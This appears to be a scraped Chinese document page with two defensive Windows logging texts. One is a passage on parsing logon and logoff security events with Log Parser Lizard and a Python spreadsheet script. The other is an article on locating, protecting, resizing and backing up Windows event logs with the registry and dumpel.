1.2.3 事件4634(注销)1.3 日志分析工具log_parser_lizard工具介绍:一个Log Parser的图形版,功能强大(可能需要安全相关依赖,我一开始安装了Log Parser)使用参考连接: /post/2012/03/26/Useful-tool-Log-Parser-Lizard-GUI.aspx下载地址:https:///lizardlabsdataUS/LogParserLizardSetup.msi获取15天免费key,需要注册邮箱:https:///forms/d/e/1FAIpQLSeB09sSTV_kxMpHcWpxp5CFBFh_fE8SRRKm2E F0v3Chsk_3fA/viewform工具界面:执行查询:我这里把相关安全日志单独copy一份,下面是我执行的语句:相应字段:执行结果:strings难以查看,导出excel后,使用python处理了一下:#! /usr/bin/python# _*_ coding:utf-8 _*_import xlrdimport xlwtimport timeworkbook = xlrd.open_workbook('zhangsan.xlsx')sheet = workbook.sheets()[0]nrows = sheet.nrowsncols = sheet.ncolsworkbook1 = xlwt.Workbook()sheet1 = workbook1.add_sheet('my sheet')sheet1.write(0, 0, u'时间')sheet1.write(0, 1, u'事件ID')sheet1.write(0, 2, u'事件类型')sheet1.write(0, 3, u'描述')for i in range(1, nrows):row = sheet.row_values(i)timegenerated = xlrd.xldate_as_tuple(row[0], 0)timegenerated = '{}/{}/{} {}:{}:{}'.format(timegenerated[0], timegenerated[1], timegenerated[2], timegenerated[3], timegenerated[4], timegenerated[5])eventid = int(row[1])string = str(row[2]).split('|')if eventid == 4648:event_type = u'尝试登录'account_name01 = string[1]account_domain01 = string[2]account_name02 = string[5]account_domain02 = string[6]destination_servername01 = string[8]ip_addr01 = string[12]result = u'使用者:{}:{},凭证:{}:{},目标服务器:{},网络信息:{}'.format(account_name01, account_domain01, account_name02, account_domain02,destination_servername01,ip_addr01)elif eventid == 4624:event_type = u'登录成功'account_name11 = string[1]account_domain11 = string[2]account_name12 = string[5]account_domain12 = string[6]login_type11 = string[8]workstation11 = string[11]ip_addr11 = string[18]result = u'使用者:{}:{},登录用户:{}:{},登录类型:{},网络信息:{}:{}'.format(account_name11, account_domain11, account_name12, account_domain12, login_type11,workstation11, ip_addr11)elif eventid == 4634:event_type = u'注销'account_name21 = string[1]account_domain21 = string[2]login_type21 = string[4]result = u'使用者:{}:{},登录类型:{}'.format(account_name21, account_domain21, login_type21)else:result = string# print i, timegenerated, eventid, resultsheet1.write(i, 0, timegenerated)sheet1.write(i, 1, eventid)sheet1.write(i, 2, event_type)sheet1.write(i, 3, result)workbook1.save('zhanghang.xls')最终处理结果如下:希望此文可以给关注windows主机的同学提供一些新的思路。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Windows日志及其保护
日志文件(log)记录着Windows系统及其各种服务运行的每个细节,对增强Windows的稳定和安全性,起着非常重要的作用。
如果不注意对它保护,被人将日志文件清空或篡改,会给系统带来严重的安全隐患。
日志文件是Windows系统中一个比较特殊的文件,它记录着Windows系统中所发生的一切,如各种系统服务的启动、运行、关闭等信息。
Windows系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%\system32\config,默认文件大小512KB。
安全日志文件:%systemroot%\system32\config\SecEvent.EVT
系统日志文件:%systemroot%\system32\config\SysEvent.EVT
应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT
[查看日志文件的方法]
在Windows系统中查看日志文件很简单。
点击“开始-设置-控制面板-管理工具-事件查看器”,在事件查看器窗口左栏中列出本机包含的日志类型,如应用程序、安全、系统等。
查看某个日志记录也很简单,在左栏中选中某个类型的日志,如应用程序,接着在右栏中列出该类型日志的所有记录,双击其中某个记录,弹出“事件属性”对话框,显示出该记录的详细信息,这样我们就能准确的掌握系统中到底发生了什么事情,是否影响Windows的正常运行,一旦出现问题,即时查找排除。
[日志的安全配置]
1.修改日志文件存放目录
Windows日志文件默认路径是“%systemroot%system32config”,我们可以通过修改注册表来改变它的存储目录,来增强对日志的保护。
在注册表编辑器中,依次展开“HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog”后,下面的Application、Security、System几个子项分别对应应用程序日志、安全日志、系统日志。
可以把它们重定位,放到其它目录中。
2.日志文件的大小
默认的条件下,日志的大小为512KB大小,如果超出则会报错,并且不会再记录任何日志。
所以首要任务是更改默认大小,具体方法:注册表中HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog对应的每个日志如系统,安全,应用程序等均有一个maxsize子键,修改即可。
[日志的查询与备份]
一个优秀的管理员是应该养成备份日志的习惯,如果有条件的话还应该把日志转存到备份机器上或直接转储到打印机上,可以使用微软的resourceKit工具箱中的dumpel.exe,他的常用方法:
dumpel -f filename -s \\server -l log
-f filename 输出日志的位置和文件名
-s \\server 输出远程计算机日志
-l log log 可选的为system,security,application,可能还有别的如DNS等.
如要把目标服务器server上的系统日志转存为backupsystem.log可以用以下格式:
dumpel \\server -l system -f backupsystem.log
再利用计划任务可以实现定期备份系统日志。